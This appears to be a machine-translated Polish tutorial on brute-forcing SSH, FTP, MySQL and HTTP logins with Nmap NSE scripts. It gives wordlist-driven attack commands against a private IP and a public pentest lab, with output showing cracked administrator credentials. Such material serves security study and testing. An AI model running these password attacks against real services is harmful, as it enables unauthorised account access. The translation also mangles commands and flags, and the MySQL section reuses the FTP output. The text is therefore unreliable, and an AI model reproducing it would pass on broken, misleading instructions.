Bruntowy hasło za pomocą NMAP

Bruntowy hasło za pomocą NMAP
Aby brutalna siła usługi online, ludzie zwykle używają frameworka Hydra, Medusa i Metasploit, ale NMAP można również wykorzystać do brutalnej siły wielu usług online. Istnieją wbudowane skrypty NMAP, które obsługują FTP, MySQL, SMTP, SNMP, SSH, Telnet, LDAP i inne różne usługi. Możesz także brutalne metody uwierzytelniania oparte na formularzu HTTP, podstawowe i trawienie. Jeśli masz zainstalowany NMAP, możesz zobaczyć te skrypty w katalogu „/usr/share/nmap/scenariusz”.
Ubuntu@ubuntu: ~ $ sudo apt aktualizacja && sudo apt aktualizację
Ubuntu@ubuntu: ~ $ sudo apt instontuj nmap -y
Ubuntu@ubuntu: ~ $ cd/usr/share/nmap/scripts/
Ubuntu@ubuntu: ~ $ ls *brute *

W tym samouczku zbadamy, w jaki sposób możemy użyć NMAP do ataku brutalnej siły.

SSH Brute Force

SSH to bezpieczny protokół zdalny i obsługuje uwierzytelnianie OpenSSL i hasło. Aby uwierzytelnianie oparte na hasłach Brute Force SSH, możemy użyć „SSH-Brute.NSE ”skrypt nmap.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls*ssh*brute*
SSH-Brute.nse

Przekaż nazwę użytkownika i listy haseł jako argument NMAP.

Ubuntu@ubuntu: ~ $ nmap - -Script SSH -Brute -p22 192.168.43.181
--Script-Args UserDB = Użytkownicy.txt, passdb = hasła.tekst
Rozpoczęcie Nmap 7.70 (https: // nmap.org) o 2020-02-08 17:09 pkt
Raport Scan NMAP za 192.168.43.181
Gospodarz jest w górę (0.Opóźnienie 00033s).
Usługa państwa portowego
22/TCP Open SSH
|. SSH-Brute:
|. Konta:
|. Administrator: P4SSW0RD - Ważne poświadczenia
| _ Statystyka: Wykonano 99 domysłu w 60 sekund, średni TPS: 1.7
NMAP wykonane: 1 adres IP (1 host w górę) zeskanowany w 60.17 sekund

FTP Brute Force

FTP to protokół transferu plików, który obsługuje uwierzytelnianie oparte na hasłach. Aby Brute Force FTP, użyjemy „FTP-Brute.NSE ”skrypt nmap.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls*ftp*brute*
FTP-Brute.nse

Przekaż nazwę użytkownika i listy haseł jako argument NMAP.

Ubuntu@ubuntu: ~ $ nmap - -Script ftp -Brute -p21 192.168.43.181-argumenty Script
userDB = Użytkownicy.txt, passdb = hasła.tekst
Rozpoczęcie Nmap 7.70 (https: // nmap.org) o 2020-02-08 16:51 pkt
Raport Scan NMAP za 192.168.43.181
Gospodarz jest w górę (0.Opóźnienie 00021s).
Usługa państwa portowego
21/TCP Otwórz FTP
|. FTP-Brute:
|. Konta:
|. Administrator: P4SSW0RD - Ważne poświadczenia
| _ Statystyka: wykonano 99 domysły w 20 sekund, średni TPS: 5.0
NMAP wykonane: 1 adres IP (1 host w górę) zeskanowany w 19.50 sekund

Mysql Brute Force

Czasami MySQL jest otwarty na połączenia zewnętrzne i pozwala każdemu z nim połączyć. Jego hasło można pękać za pomocą NMAP za pomocą skryptu „MySQL-Brute”.

Ubuntu@ubuntu: ~ $ sudo nmap -Script MySQl -Brute -p3306 192.168.43.181
--Script-Args UserDB = Użytkownicy.txt, passdb = hasła.tekst
Rozpoczęcie Nmap 7.70 (https: // nmap.org) o 2020-02-08 16:51 pkt
Raport Scan NMAP za 192.168.43.181
Gospodarz jest w górę (0.Opóźnienie 00021s).
Usługa państwa portowego
3306/TCP Otwórz mysql
|. FTP-Brute:
|. Konta:
|. Administrator: P4SSW0RD - Ważne poświadczenia
| _ Statystyka: wykonano 99 domysły w 20 sekund, średni TPS: 5.0
NMAP wykonane: 1 adres IP (1 host w górę) zeskanowany w 19.40 sekund

HTTP Brute Force

HTTP używa trzech rodzajów uwierzytelniania do uwierzytelniania użytkowników na serwery internetowe. Metodologie te są używane w routerach, modemach i zaawansowanych aplikacjach internetowych do wymiany nazw użytkowników i haseł. Te typy to:

Podstawowe uwierzytelnianie

W protokole uwierzytelniania HTTP przeglądarka koduje nazwę użytkownika i hasło z Base64 i wysyła ją pod nagłówkiem „autoryzacja”. Możesz to zobaczyć na poniższym zrzucie ekranu.

Autoryzacja: podstawowy ywrtaw46ywrtaw4 =

Możesz basować64 dekodować ten ciąg, aby zobaczyć nazwę użytkownika i hasło

Ubuntu@ubuntu: ~ $ echo ywrtaw46ywrtaw4 = | base64 -d
Admin: admin

Podstawowe uwierzytelnianie HTTP jest niepewne, ponieważ wysyła zarówno nazwę użytkownika, jak i hasło w zwykłym tekście. Każdy atakujący man-in-the-middle może łatwo przechwycić ruch i dekodować ciąg, aby uzyskać hasło.

Uwierzytelnianie trawienia

Uwierzytelnianie HTTP Digest wykorzystuje techniki mieszania do szyfrowania nazwy użytkownika i hasła przed wysłaniem go na serwer.

HASH1 = MD5 (Nazwa użytkownika: Realm: hasło)
HASH2 = MD5 (Metoda: Digesturi)
Odpowiedź = MD5 (HASH1: Nonce: NonCecount: CNONCE: QOP: HASH2)

Możesz zobaczyć te wartości pod nagłówkiem „autoryzacja”.

Uwierzytelnianie oparte na trawieniu jest bezpieczne, ponieważ hasło nie jest wysyłane zwykłym tekstem. Jeśli atakujący man-wściekli przechwytuje ruch, nie będzie w stanie uzyskać hasła zwykłego tekstu.

Uwierzytelnianie oparte na formularzu

Uwierzytelnianie podstawowe i trawienia tylko obsługują przesyłanie nazwy użytkownika i hasła, podczas gdy uwierzytelnianie oparte na formularzach można dostosować w oparciu o potrzeby użytkownika. Możesz zbudować własną stronę internetową w HTML lub JavaScript, aby zastosować własne techniki kodowania i transferu.

Zwykle dane w formularzu uwierzytelnianie są wysyłane zwykłym tekstem. W przypadku problemów z bezpieczeństwem należy zastosować HTTPS, aby zapobiec atakom man-w średnim.

Możemy brutalnie wymusić wszystkie rodzaje uwierzytelniania HTTP za pomocą NMAP. W tym celu użyjemy skryptu „http-brute”.

Ubuntu@ubuntu:/usr/share/nmap/script/$ ls*http*brute*
http-brute.nse

Aby przetestować ten skrypt NMAP, rozwiążemy publicznie hostowane wyzwanie Brute Force przez Pentester Academy na tym adresie URL http: // pentesteracademylab.Appspot.com/lab/webapp/basicauth.

Musimy podać wszystko, w tym nazwę hosta, URI, metody żądania i słowniki osobno jako argument skryptu.

Ubuntu@ubuntu: ~ $ sudo nmap -p80 -Script Http -Brute PentestesteracademyLab.Appspot.com
--argaty skryptowe http-brute.Nazwa hosta = PentesteracademyLab.Appspot.com,
http-brute.ścieżka =/lab/webapp/basicauth, userdb = użytkownicy.txt, passdb = hasła.tekst,
http-brute.metoda = post
Rozpoczęcie Nmap 7.70 (https: // nmap.org) o 2020-02-08 21:37 PKT
Raport skanowania NMAP dla Pentestestesteracademylab.Appspot.com (216.58.210.84)
Gospodarz jest w górę (0.Opóźnienie 20s).
Inne adresy dla Pentestesteracademylab.Appspot.com (nie zeskanowany): 2A00: 1450: 4018: 803 :: 2014
rekord RDNS dla 216.58.210.84: MCT01S06-in-F84.1E100.internet
Usługa państwa portowego
80/TCP Otwórz HTTP
|. HTTP-Brute:
|. Konta:
|. Administrator: AADDD - Ważne poświadczenia
| _ Statystyka: wykonano 165 domysłu w 29 sekundach, średni TPS: 5.3
NMAP wykonane: 1 adres IP (1 host w górę) zeskanowany w 31.22 sekundy

Wniosek

NMAP może być używany do robienia wielu rzeczy, pomimo zwykłego skanowania portów. Może zastąpić Metasploit, Hydra, Medusa i wiele innych narzędzi wykonanych specjalnie do Brute Brute Brute. NMAP ma proste, łatwe w użyciu wbudowane scenariusze, które brutalne formy prawie każdej usługi, w tym HTTP, Telnel, SSH, MySQL, Samba i inne.